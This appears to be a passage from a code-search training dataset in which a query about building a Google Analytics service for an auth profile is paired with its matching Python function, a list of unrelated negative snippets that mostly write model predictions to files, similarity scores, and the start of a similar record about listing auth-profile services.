writer.writerow({'itemid': id, 'hasbird': probs[i][0], 'pred': preds[i], 'gt': targets[i]})\n writer.writerow({'itemid': id, 'hasbird': probs[i][0]})\n\n print \"INFO: predictions (positive class probas) saved to file:\", outfile",
"def write(self, predictions, filename):\n assert predictions.ndim == 2 or predictions.ndim == 3\n\n driver = self.dataset.GetDriver()\n\n if predictions.ndim == 2:\n dst_ds = driver.CreateCopy(filename, self.dataset)\n # Overwrite the raster band with the predicted labels\n band = dst_ds.GetRasterBand(1)\n band.WriteArray(predictions)\n else:\n for t in range(predictions.shape[0]):\n dst_filename = filename.replace('.tif', '_{}.tif'.format(t))\n dst_ds = driver.CreateCopy(dst_filename, self.dataset)\n\n # Overwrite the raster band with the predicted labels\n band = dst_ds.GetRasterBand(1)\n band.WriteArray(predictions[t])",
"def write_predictions(self, predictions, evaluations=None, data=None, p_out=None, d_out=None):\n\n if not d_out:\n d_out = os.path.split(data.p_data)[0]\n elif not os.path.isdir(d_out):\n os.makedirs(d_out)\n if self.verbose:\n print('\\nCreated folder: %s ' % d_out)\n\n d_out += '/' if not d_out.endswith('/') else ''\n\n timestamp = datetime.now()\n if not p_out:\n tmp = data.p_data.replace(\n '.tsv', '-metaboloc-%s-%s.tsv' % (timestamp.strftime('%Y%m%d%H%M%S'),\n ''.join(np.random.choice(list('abcdef123456'), 6))))\n p_out = d_out + os.path.split(tmp)[1]\n\n labels = np.array(data.labels)\n\n # compile predictions\n yopts = ['' for _ in range(len(data.nodes))]\n\n # compile baseline\n ybls = ['' for _ in range(len(data.nodes))]\n\n for idx, yopt, ybl in zip(predictions['nidxs'], predictions['yopt'], predictions['ybl']):\n yopts[idx] = '/'.join(labels[np.array(self._round(yopt), dtype=bool)])\n ybls[idx] = '/'.join(labels[np.array(self._round(ybl), dtype=bool)])\n\n # compile known\n if evaluations:\n for idx, yopt, ytruth, ybl in zip(evaluations['nidxs'], evaluations['yopt'], evaluations['ytruth'],\n predictions['ybl']):\n yopt_bool = np.array(self._round(yopt), dtype=bool)\n truth_bool = np.array(ytruth, dtype=bool)\n yopts[idx] = '/'.join(labels[yopt_bool | truth_bool])\n ybls[idx] = '/'.join(labels[np.array(self._round(ybl), dtype=bool)])\n\n # Add truth and predictions to dataframe\n df = data.df.assign(predictions=yopts)\n\n # Add baseline to dataframe\n df = df.assign(baseline=ybls)\n\n # Write predictions\n df.to_csv(p_out, sep='\\t', index=False)\n\n print('Results written to %s\\n' % p_out)\n\n return p_out",
"def save_predictions(prediction_maps, output_file, dataset_names):\n assert len(prediction_maps) == len(dataset_names), 'Each prediction map has to have a corresponding dataset name'\n logger.info(f'Saving predictions to: {output_file}...')\n\n with h5py.File(output_file, \"w\") as output_h5:\n for prediction_map, dataset_name in zip(prediction_maps, dataset_names):\n logger.info(f\"Creating dataset '{dataset_name}'...\")\n output_h5.create_dataset(dataset_name, data=prediction_map, compression=\"gzip\")",
"def CardiacDiagnosisModelTester(clf, final_test_path, name, scaler, save_dir='./', label_available=False, prediction_csv=None):\n class_names = [MINF, DCM]\n df = load_dataframe(final_test_path, column='GROUP')\n features = list(df.columns[np.r_[START_COL:END_COL]])\n X_df = df[features]\n X_scaled = scaler.transform(X_df) \n y_pred = clf.predict(X_scaled)\n print (\"Writing predictions to file\", name)\n target = open(save_dir+'/'+ name+'predictions_{}.txt'.format(time.strftime(\"%Y%m%d_%H%M%S\")), 'w')\n classes = {MINF:0, DCM:0}\n for pid, pred in zip(df['Name'], y_pred):\n classes[class_names[pred]] +=1\n line = '{} {}'.format(pid, class_names[pred])\n target.write(line)\n target.write(\"\\n\")\n target.close()\n print (classes)\n if label_available:\n y_true,_ = encode_target(df, 'GROUP', heart_disease_label_map)\n accuracy = accuracy_score(y_true['GROUP'], y_pred)\n print(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n else:\n if prediction_csv:\n pdf = pd.read_csv(test_on_prediction)\n for pid, pred in zip(df['Name'], y_pred):\n #https://www.shanelynn.ie/select-pandas-dataframe-rows-and-columns-using-iloc-loc-and-ix/\n pdf.loc[pdf['Name']== pid, 'GROUP'] = class_names[pred]\n pdf.to_csv(prediction_csv, index=False)\n # Upload file\n with open(os.path.join(os.path.dirname(prediction_csv), 'ACDC_Predictions.txt'),'w') as outfile:\n pdf.to_string(outfile, columns=['Name','GROUP'], index=False, header=False)",
"def write_out_prediction(predictions_file, src_seqs,\n trg_seqs, pred_string, src_feat_bundles,\n trg_feat_bundles, val_id):\n\n output_lines = []\n if trg_seqs[val_id] != pred_string:\n output_lines.append('*ERROR*')\n output_lines.append('SRC: {}'.format(src_seqs[val_id]))\n if src_feat_bundles[val_id]:\n output_lines.append('SFT: {}'.format(src_feat_bundles[val_id]))\n if trg_feat_bundles[val_id]:\n output_lines.append('TFT: {}'.format(trg_feat_bundles[val_id]))\n output_lines.append('TRG: {}'.format(trg_seqs[val_id]))\n output_lines.append('PRD: {}\\n'.format(pred_string))\n predictions_file.write('{}\\n'.format('\\n'.join(output_lines)))",
"def create_submission_file(classifiers, preprocessor, batch_size, classification_threshold=0.2):\r\n x_test_filename = preprocessor.X_test\r\n steps = len(x_test_filename) / batch_size\r\n y_map = preprocessor.y_map\r\n predictions = None\r\n for classifier in classifiers:\r\n test_gen = preprocessor.get_prediction_generator(batch_size)\r\n predictions_tmp = classifier.predict_gen(test_gen, steps)\r\n if predictions is None:\r\n predictions = predictions_tmp\r\n else:\r\n predictions += predictions_tmp\r\n\r\n predictions = predictions / len(classifiers)\r\n logger.info(\"Predictions shape: {}\\nFiles name shape: {}\\n1st predictions entry:\\n{}\".format(predictions.shape,\r\n x_test_filename.shape,\r\n predictions[0]))\r\n\r\n thresholds = [classification_threshold] * len(y_map)\r\n\r\n predicted_labels = classifier.map_predictions(predictions, y_map, thresholds)\r\n\r\n # Finally lets assemble and visualize our prediction for the test dataset\r\n tags_list = [None] * len(predicted_labels)\r\n for i, tags in enumerate(predicted_labels):\r\n tags_list[i] = ' '.join(map(str, tags))\r\n\r\n final_data = [[filename.split(\".\")[0], tags] for filename, tags in zip(x_test_filename, tags_list)]\r\n\r\n final_df = pd.DataFrame(final_data, columns=['image_name', 'tags'])\r\n\r\n # And save it to a submission file\r\n final_df.to_csv('../submission_file.csv', index=False)\r\n classifier.close()\r\n return None",
"def write_model_results(model, input_file, repr, tags, outpath):\n input, input_data = read_input(input_file)\n\n if repr == \"c\":\n x = utils.get_features(input, ixs=3)\n else:\n x = utils.get_features(input, chars=True)\n\n w_batcher = utils.AutoBatcher(x, x, batch_size=1, shuffle=False)\n labels = []\n for inputs, _ in w_batcher.get_batches():\n output = torch.max(model(inputs), 1)[1]\n labels += output.cpu().data.numpy().tolist()\n\n predictions = utils.NEWLINE.join([\"{} {}\".format(input_data[i], tags[labels[i]])\\\n for i in range(len(input_data))])\n with open(outpath, \"w\") as outfile:\n outfile.write(predictions)",
"def save_prediction(predictions, image_file, path):\n\t\n\tsave_file = convert_file_extension_to_txt(image_file)\n\t\n\twith open(os.path.join(path, save_file), 'w') as f:\n\t\tfor prediction in predictions:\n\t\t\tf.write(str(prediction) + \"\\n\")",
"def save_results(output_dir,\n check_file,\n results,\n exp_string,\n identifier,\n shuffle_labels,\n model_options,\n predictor='classify',\n fold_no=None,\n titration_ratio=None):\n\n signal = 'shuffled' if shuffle_labels else 'signal'\n\n if not isinstance(model_options.training_data, str):\n training_data = '.'.join(model_options.training_data)\n else:\n training_data = model_options.training_data\n\n if isinstance(model_options.n_dim, list):\n n_dim = '.'.join(map(str, model_options.n_dim))\n else:\n n_dim = model_options.n_dim\n\n if predictor == 'classify':\n auc_df = pd.concat(results[\n '{}_auc'.format(exp_string)\n ])\n output_file = construct_filename(output_dir,\n 'auc_threshold_metrics',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n s=model_options.seed,\n n=n_dim,\n f=fold_no,\n t=titration_ratio)\n auc_df.to_csv(\n output_file, sep=\"\\t\", index=False, float_format=\"%.5g\"\n )\n\n aupr_df = pd.concat(results[\n '{}_aupr'.format(exp_string)\n ])\n output_file = construct_filename(output_dir,\n 'aupr_threshold_metrics',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n s=model_options.seed,\n n=n_dim,\n f=fold_no,\n t=titration_ratio)\n aupr_df.to_csv(\n output_file, sep=\"\\t\", index=False, float_format=\"%.5g\"\n )\n\n if '{}_coef'.format(exp_string) in results:\n coef_df = pd.concat(results[\n '{}_coef'.format(exp_string)\n ])\n coef_df.to_csv(\n check_file, sep=\"\\t\", index=False, float_format=\"%.5g\"\n )\n\n metrics_df = pd.concat(results[\n '{}_metrics'.format(exp_string)\n ])\n\n if '{}_preds'.format(exp_string) in results:\n preds_df = pd.concat(results[\n '{}_preds'.format(exp_string)\n ])\n else:\n preds_df = None\n\n if '{}_param_grid'.format(exp_string) in results:\n params_df = pd.concat(results[\n '{}_param_grid'.format(exp_string)\n ])\n else:\n params_df = None\n\n output_file = construct_filename(output_dir,\n 'metrics',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n predictor,\n s=model_options.seed,\n n=n_dim,\n f=fold_no,\n t=titration_ratio)\n metrics_df.to_csv(\n output_file, sep=\"\\t\", index=False, float_format=\"%.5g\"\n )\n\n if preds_df is not None:\n output_file = construct_filename(output_dir,\n 'preds',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n predictor,\n s=model_options.seed,\n n=n_dim,\n f=fold_no,\n t=titration_ratio)\n preds_df.to_csv(\n output_file, sep=\"\\t\", float_format=\"%.5g\"\n )\n\n if params_df is not None:\n output_file = construct_filename(output_dir,\n 'param_grid',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n predictor,\n s=model_options.seed,\n n=n_dim,\n f=fold_no)\n\n params_df.to_csv(output_file, sep=\"\\t\")",
"def get_predictions(fitted_model_filename):\n click.echo(\"Mode: predicting probabilities.\\n\")\n defaults = get_defaults()\n\n fitted_model_filename = add_extension(fitted_model_filename)\n fitted_model_path = os.path.join(defaults.OUTPUT.FITTED_MODELS_PATH, fitted_model_filename)\n new_options = [\"OUTPUT.FITTED_MODEL_PATH\", fitted_model_path]\n\n # boot_data = bootstrap(new_options, mode=\"internal_test\")\n # model = boot_data['model']\n #\n # X_test_int, y_test_int = boot_data['data']\n # internal_test_proba = model.predict_proba(X_test_int)\n # internal_test_proba = np.c_[y_test_int, internal_test_proba[:, 1]]\n\n boot_data = bootstrap(new_options, mode=\"external_test\")\n model = boot_data['model']\n X_test_ext, y_test_ext = boot_data['data']\n\n # fit scaler on train data and transform test data\n scaler = StandardScaler()\n X_train, y_train = load_data(defaults, which='train')\n\n numeric_cols = X_train.select_dtypes(include=np.float64).columns.tolist()\n scaler.fit(X_train[numeric_cols])\n X_test_ext.loc[:, numeric_cols] = scaler.transform(X_test_ext[numeric_cols])\n\n external_test_proba = model.predict_proba(X_test_ext)\n external_test_proba = np.c_[y_test_ext, external_test_proba[:, 1]]\n\n # internal_test_results_path = os.path.join(defaults.OUTPUT.PREDS_PATH, \"internal_test_preds.csv\")\n external_test_results_path = os.path.join(defaults.OUTPUT.PREDS_PATH,\n f\"external_test_preds_{fitted_model_filename.replace('.pkl', '')}.csv\")\n # pd.DataFrame(internal_test_proba, columns=['target', 'proba']).to_csv(internal_test_results_path, index=False)\n pd.DataFrame(external_test_proba, columns=['target', 'proba']).to_csv(external_test_results_path, index=False)",
"def write_predictions(estimator, vertical, source_website, target_website):\n score_dir_path = os.path.join(\n FLAGS.result_path, \"{}/{}-results/score\".format(vertical, source_website))\n\n tf.gfile.MakeDirs(score_dir_path)\n pred_filename = os.path.join(\n FLAGS.result_path,\n \"{}/{}-results/score/{}.preds.txt\".format(vertical, source_website,\n target_website))\n node_emb_filename = os.path.join(\n FLAGS.result_path,\n \"{}/{}-results/score/{}.node_emb.npz\".format(vertical, source_website,\n target_website))\n print(\"Writing predictions to file: %s\" % pred_filename, file=sys.stderr)\n golds_gen = model_util.joint_generator_fn(\n get_data_path(\n vertical=vertical, website=target_website, dev=False, goldmine=False),\n get_data_path(\n vertical=vertical, website=target_website, dev=False, goldmine=True),\n vertical,\n mode=\"all\")\n transfer_eval_input_function = functools.partial(\n model_util.joint_input_fn,\n get_data_path(\n vertical=vertical, website=target_website, dev=False, goldmine=False),\n get_data_path(\n vertical=vertical, website=target_website, dev=False, goldmine=True),\n vertical,\n mode=\"all\")\n preds_gen = estimator.predict(transfer_eval_input_function)\n prediction_str = \"\"\n if FLAGS.extract_node_emb:\n node_embs = []\n for gold, pred in zip(golds_gen, preds_gen):\n if FLAGS.circle_features:\n ((nnodes), (_), (words_list, words_len), (_, _), (_, _),\n (partner_words, _), (friend_words, _), (_, _), (_, _),\n (html_path, xpath_list), (_, _), (_, _), (_)), tags = gold\n\n for index in range(nnodes):\n normalized_partner = []\n for w in partner_words[index]:\n normalized_partner.append(normalize_text(w))\n\n if FLAGS.match_keywords:\n normalized_word = [\n normalize_text(w)\n for w in words_list[index][:words_len[index]]\n ]\n candicate_labels = constants.ATTRIBUTES[vertical]\n print(\"Partner: %s, Words: %s, Pred: %s\" %\n (\" \".join(normalized_partner), \" \".join(normalized_word),\n pred[\"tags\"][index]))\n normalized_partner = \" \".join(normalized_partner)\n for i, l in enumerate(candicate_labels):\n l = str(l).lower().replace(\"tor\", \"t\").split(\"_\")\n status = all([x in normalized_partner for x in l])\n if status:\n print(\"OLD:\", pred[\"tags\"][index])\n print(\"NEW:\", candicate_labels[i].encode())\n pred[\"tags\"][index] = candicate_labels[i].encode()\n\n if FLAGS.friend_encoder:\n normalized_friend = []\n for w in friend_words[index]:\n normalized_friend.append(normalize_text(w))\n print(normalized_friend)\n print(pred[\"friends_embs\"][index])\n\n else:\n ((nnodes), (words_list, words_len), (_, _), (_, _), (_, _),\n (html_path, xpath_list), (_, _), (_), (_)), tags = gold\n assert nnodes == len(words_list) == len(tags)\n for index in range(nnodes):\n s = \"\\t\".join([\n str(html_path, \"utf-8\"),\n str(xpath_list[index], \"utf-8\"),\n \" \".join([\n str(w, \"utf-8\") for w in words_list[index][:int(words_len[index])]\n ]),\n str(tags[index], \"utf-8\"),\n str(pred[\"tags\"][index], \"utf-8\"),\n \",\".join([str(score) for score in pred[\"raw_scores\"][index]]),\n ]) + \"\\n\"\n prediction_str += s\n if FLAGS.extract_node_emb:\n node_embs.append([float(i) for i in pred[\"node_embs\"][index]])\n\n with tf.gfile.Open(pred_filename, \"w\") as f:\n f.write(prediction_str)\n\n node_embs = np.array(node_embs)\n # Save np.array to file.\n with tf.gfile.Open(node_emb_filename, \"wb\") as gfo:\n print(\"Writing node emb pickle: %s\" % node_emb_filename, file=sys.stderr)\n pickle.dump(node_embs, gfo)\n print(\"Node Representation Save- done.\", file=sys.stderr)",
"def create_identical_truth_and_prediction_file():\r\n # Create an artificial email classification dictionary \r\n class_dict = create_classification()\r\n # Compile the filepaths\r\n truth_filepath = os.path.join(CORPUS_DIR, TRUTH_FILENAME)\r\n pred_filepath = os.path.join(CORPUS_DIR, PREDICTION_FILANAME)\r\n # Save the same dictionary as both the !truth.txt and !prediction.txt\r\n save_classification_to_file(class_dict, truth_filepath)\r\n save_classification_to_file(class_dict, pred_filepath)"
] |
[
"0.7049729",
"0.6968634",
"0.68207085",
"0.6750549",
"0.6720341",
"0.6711167",
"0.6669633",
"0.6594437",
"0.6516126",
"0.6487627",
"0.64480585",
"0.6412054",
"0.6412046",
"0.6412046",
"0.6334649",
"0.63231057",
"0.63150644",
"0.6295352",
"0.6271988",
"0.623328",
"0.6209309",
"0.62061495",
"0.61464554",
"0.6143623",
"0.61383986",
"0.6120063",
"0.6116419",
"0.60757047",
"0.60525215",
"0.6045143"
] |
0.8186171
|
0
|
Build Google Analytics service for the auth profile
|
def get_service(self, auth_profile):
app_root = self.config['app_root_dir']
client_secrets_path = os.path.join(app_root, auth_profile['client_secrets_path'])
token_path = os.path.join(app_root, auth_profile['token_path'])
auth = GoogleAuth(self.auth_flags, client_secrets_path, token_path)
service = auth.build_service('analytics', 'v3')
return service
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_Analytics_service():\n #reference: https://developers.google.com/analytics/devguides/reporting/core/v4/\n credentials = get_credentials()\n \n http = httplib2.Http()\n http = credentials.authorize(http)\n service = apiclient.discovery.build('analytics', 'v4', http=http)\n print \"Got Analytics service\"\n\n return service",
"def initialize_analyticsreporting():\n print \"authenticating\"\n credentials = ServiceAccountCredentials.from_p12_keyfile(\n SERVICE_ACCOUNT_EMAIL, KEY_FILE_LOCATION, scopes=SCOPES)\n\n http = credentials.authorize(httplib2.Http())\n\n # Build the service object.\n analytics = build('analytics', 'v4', http=http, discoveryServiceUrl=DISCOVERY_URI)\n\n return analytics",
"def initialize_service():\r\n http = httplib2.Http()\r\n credentials = prepare_credentials()\r\n http = credentials.authorize(http)\r\n return build('analytics', 'v3', http=http)",
"def initialize_analyticsreporting():\n logging.info(\"Initializing Analytics API...\")\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n\n return analytics",
"def initialize_analyticsreporting():\n\n # Build the credentials object\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES,\n )\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n return analytics",
"def initialize_analyticsreporting():\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n\n return analytics",
"def initialize_analyticsreporting():\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n\n return analytics",
"def initialize_analyticsreporting():\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n\n return analytics",
"def reportService():\n scopes = os.environ.get('GA_API_SCOPES').split(',')\n name = os.environ.get('GA_API_NAME')\n version = os.environ.get('GA_API_VERSION')\n file_path = os.environ.get('GA_API_CREDS')\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n file_path, \n scopes=scopes\n )\n\n service = build(name, version, credentials=credentials)\n\n return service",
"def create_service_object(credentials):\n http_auth = httplib2.Http()\n http_auth = credentials.authorize(http_auth)\n service = discovery.build('analytics', 'v3', http=http_auth)\n return service",
"def initialize_analyticsreporting():\n # Parse command-line arguments.\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n parents=[tools.argparser])\n flags = parser.parse_args([])\n\n # Set up a Flow object to be used if we need to authenticate.\n flow = client.flow_from_clientsecrets(\n CLIENT_SECRETS_PATH, scope=SCOPES,\n message=tools.message_if_missing(CLIENT_SECRETS_PATH))\n\n # Prepare credentials, and authorize HTTP object with them.\n # If the credentials don't exist or are invalid run through the native client\n # flow. The Storage object will ensure that if successful the good\n # credentials will get written back to a file.\n storage = file.Storage('auth/analyticsreporting.dat')\n credentials = storage.get()\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, flags)\n http = credentials.authorize(http=httplib2.Http())\n\n # Build the service object.\n analytics = build('analytics', 'v4', http=http, discoveryServiceUrl=DISCOVERY_URI)\n\n return analytics",
"def initialize_analyticsreporting():\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n ga_conn = build('analyticsreporting', 'v4', credentials=credentials)\n\n return ga_conn",
"def managementService():\n scopes = os.environ.get('GA_API_SCOPES').split(',')\n name = 'analytics'\n version = 'v3'\n file_path = os.environ.get('GA_API_CREDS')\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n file_path, \n scopes=scopes\n )\n\n management_service = build(name, version, credentials=credentials)\n\n return management_service",
"def initialize_analyticsreporting():\n # Parse command-line arguments.\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n parents=[tools.argparser])\n flags = parser.parse_args([])\n\n # Set up a Flow object to be used if we need to authenticate.\n flow = client.flow_from_clientsecrets(\n CLIENT_SECRETS_PATH, scope=SCOPES,\n message=tools.message_if_missing(CLIENT_SECRETS_PATH))\n\n # Prepare credentials, and authorize HTTP object with them.\n # If the credentials don't exist or are invalid run through the native client\n # flow. The Storage object will ensure that if successful the good\n # credentials will get written back to a file.\n storage = file.Storage('analyticsreporting.dat')\n credentials = storage.get()\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, flags)\n http = credentials.authorize(http=httplib2.Http())\n\n # Build the service object.\n analytics = build('analytics', 'v4', http=http, discoveryServiceUrl=DISCOVERY_URI)\n\n return analytics",
"def initialize_analyticsreporting():\n # Parse command-line arguments.\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n parents=[tools.argparser])\n flags = parser.parse_args([])\n\n # Set up a Flow object to be used if we need to authenticate.\n flow = client.flow_from_clientsecrets(\n CLIENT_SECRETS_PATH, scope=SCOPES,\n message=tools.message_if_missing(CLIENT_SECRETS_PATH))\n\n # Prepare credentials, and authorize HTTP object with them.\n # If the credentials don't exist or are invalid run through the native client\n # flow. The Storage object will ensure that if successful the good\n # credentials will get written back to a file.\n storage = file.Storage('./config/analyticsreporting.dat')\n credentials = storage.get()\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, flags)\n http = credentials.authorize(http=Http())\n\n # Build the service object.\n analytics = build('analytics', 'v4', http=http, discoveryServiceUrl=DISCOVERY_URI)\n\n return analytics",
"def google_analytics(self) -> Optional[pulumi.Input['ConnectorProfileConnectorProfileConfigConnectorProfileCredentialsGoogleAnalyticsArgs']]:\n return pulumi.get(self, \"google_analytics\")",
"def google_analytics(request):\n return {\n 'GOOGLE_ANALYTICS_KEY': settings.GOOGLE_ANALYTICS_KEY,\n }",
"def google_analytics(request):\n ga_id = None\n\n if get_current_site(request).name == \"Scorecard\":\n ga_id = getattr(settings, \"GOOGLE_ANALYTICS_SCORECARD_ID\", None)\n gtag_id = getattr(settings, \"GOOGLE_GA4_SCORECARD_ID\", None)\n else:\n ga_id = getattr(settings, \"GOOGLE_ANALYTICS_DATA_ID\", None)\n gtag_id = getattr(settings, \"GOOGLE_GA4_DATA_ID\", None)\n\n return {\"GOOGLE_ANALYTICS_ID\": ga_id, \"GOOGLE_GA4_TAG\": gtag_id}",
"def build_service():\n\n\tstore = file.Storage('credentials.json')\n\tcreds = store.get()\n\tif not creds or creds.invalid:\n\t flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)\n\t creds = tools.run_flow(flow, store)\n\tservice = build('gmail', 'v1', http=creds.authorize(Http(disable_ssl_certificate_validation=True)))\n\treturn service",
"def build_service():\r\n creds = None\r\n # The file token.pickle stores the user's access and refresh tokens, and is\r\n # created automatically when the authorization flow completes for the first\r\n # time.\r\n if os.path.exists('token.pickle'):\r\n with open('token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n # If there are no (valid) credentials available, let the user log in.\r\n if not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n f\"{EMAIL_ACCOUNT_FILE}\", SCOPES)\r\n creds = flow.run_local_server(port=0)\r\n # Save the credentials for the next run\r\n with open('token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\n service = build('gmail', 'v1', credentials=creds)\r\n return service",
"def __init__(self, account_name=None, property_name=None, profile_name=None, ga_settings=None, logging_obj=None):\n if logging_obj is None:\n log_filename = get_log_filepath('Python App')\n logging_obj = Logging(name=__name__, log_filename=log_filename, log_level_str='INFO')\n self.logging_obj = logging_obj\n config_app_util = ConfigAppUtility()\n if ga_settings is None:\n ga_settings = config_app_util.get_settings_dict('GA')\n self.service_old = init('analytics', 'v3', ga_settings)\n self.service = init('analytics', 'v4', ga_settings)\n self.profile_id = None\n\n if account_name is not None and property_name is not None and profile_name is not None:\n (profile, property, account) = self.get_profile_by_name(account_name, property_name, profile_name)\n profile_id = self.get_profile_id(profile)\n self.set_profile_id(profile_id)\n else:\n log_msg = \"message='The profile ID has not been set. This needs to be set prior to executing any queries.'\"\n self.logging_obj.log(self.logging_obj.WARN, log_msg)",
"def google_analytics(self) -> Optional[pulumi.Input['ConnectorProfileConnectorProfileConfigConnectorProfilePropertiesGoogleAnalyticsArgs']]:\n return pulumi.get(self, \"google_analytics\")",
"def analytics(self):\r\n return Analytics(self.access_token)",
"def runAnalytics():\n #gets OAuth from the API\n analytics = get_Analytics_service()\n #get the object return from the API\n #send that object to print out useful fields\n response = get_report(analytics)\n print_response(response)",
"def save_google_analytics_credentials(self,credentials_dict):\n\t\tprint 'saving credentials'\n\t\t# store information necessary for building client\n\t\tcredentials_dict['token_expiry'] = datetime.now() + timedelta(hours=1)\n\t\tGAUM = GoogleAnalyticsUserModel(credentials_dict)\n\t\tdb.session.add(GAUM)\n\t\tdb.session.commit()\n\t\tdb.session.close()",
"def authorize_api(self):\n\n log.debug('computing Google authentification process for \"{}\"'.format(self.school_year))\n flow = OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, SCOPE)\n storage = Storage('credentials.dat')\n credentials = storage.get()\n\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, tools.argparser.parse_args())\n\n # Create an httplib2.Http object to handle our HTTP requests, and authorize it\n # using the credentials.authorize() function.\n http = httplib2.Http()\n http = credentials.authorize(http)\n httplib2.debuglevel = 0\n\n return build('calendar', 'v3', http=http)",
"def google_analytics_task(data, user):\n auth = (user.get('livechat_login'), user.get('livechat_api_key'))\n url = 'https://api.livechatinc.com/chats/'+data['chat']['id']+'/'\n headers = {\"X-API-Version\": \"2\"}\n request_data = requests.get(url, headers=headers, auth=auth)\n website = User.query.get(user.get('id')).\\\n websites.filter_by(group=request_data.json()['group'][0])\\\n .first_or_404()\n\n tags = [i.lower() for i in website.tags.split(', ')]\n\n for tag in request_data.json()['tags']:\n if tag.lower() in tags:\n params = urllib.parse.urlencode({\n 'v': 1,\n 'tid': website.google_track_id,\n 'cid': data['chat']['id'],\n 't': 'event',\n 'ec': 'LiveChat',\n 'ea': tag,\n 'el': data['chat']['id']\n })\n connection = http.client.HTTPConnection(\n 'www.google-analytics.com')\n connection.request('POST', '/collect', params)\n return \"\"",
"def google_session(self):\n creds = None\n SCOPES = ['https://www.googleapis.com/auth/admin.reports.audit.readonly']\n\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n self.creds_path, SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('admin', 'reports_v1', credentials=creds)\n\n return service",
"def get_gcal_service(credentials):\n app.logger.debug(\"Entering get_gcal_service\")\n http_auth = credentials.authorize(httplib2.Http())\n service = discovery.build('calendar', 'v3', http=http_auth)\n plusService = discovery.build('plus', 'v1', http=http_auth)\n app.logger.debug(\"Returning service\")\n return [service, plusService]",
"def __init__(self, username):\n\t\tself.client = None\n\t\tself.credentials = GoogleAnalyticsUserModel.query.filter_by(username = username).first()\n\t\tprint self.credentials\n\t\tif self.credentials:\n\t\t\tprint 'there are ga credentials' \n\t\t\texpires_on = self.credentials.token_expiry\n\t\t\tprint 'expires on' + str(expires_on)\n\t\t\tcurrent_time = datetime.now()\n\t\t\tprint 'current_time '+str(current_time)\n\t\t\tcredentials_dict = self.credentials.as_dict()\n\t\t\tself.credentials_dict = credentials_dict\n\t\t\tprint 'about to compare times'\n\t\t\tif current_time > expires_on:\n\t\t\t print 'credentials dict:'\n\t\t\t print self.credentials_dict\n\t\t\t print 'about to refresh token'\n\t\t\t self.refresh_token(credentials_dict.get(\"refresh_token\"), credentials_dict.get(\"client_id\"), credentials_dict.get(\"client_secret\"))\n\t\t\t print 'GA credentials: ' + str(self.credentials_dict)\n\t\t\t#else: \n\t\t\t# self.refresh_token(credentials_dict.get(\"refresh_token\"), credentials_dict.get(\"client_id\"), credentials_dict.get(\"client_secret\"))\n\n\t\t\tself.client = self.build_client()\n\t\telse:\n\t\t\tprint \"no GA credentials\"\n\t\t\treturn None"
] |
[
"0.72963715",
"0.71768534",
"0.7008515",
"0.6679525",
"0.66671413",
"0.6565561",
"0.6542577",
"0.6542577",
"0.65328103",
"0.65221035",
"0.64870876",
"0.64740664",
"0.63877106",
"0.6376841",
"0.6366579",
"0.62008286",
"0.6167424",
"0.61051875",
"0.6090958",
"0.5974501",
"0.5879415",
"0.5841206",
"0.58210343",
"0.5820534",
"0.57087713",
"0.56369275",
"0.5570848",
"0.5539658",
"0.54318154",
"0.5402221"
] |
0.79859585
|
0
|
Return list of services for all auth profiles
|
def get_services(self):
services = []
for p in self.config['auth_profiles']:
services.append(self.get_service(p))
return services
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_services(profile=None, api_key=None):\n return salt.utils.pagerduty.list_items(\n \"services\", \"name\", __salt__[\"config.option\"](profile), api_key, opts=__opts__\n )",
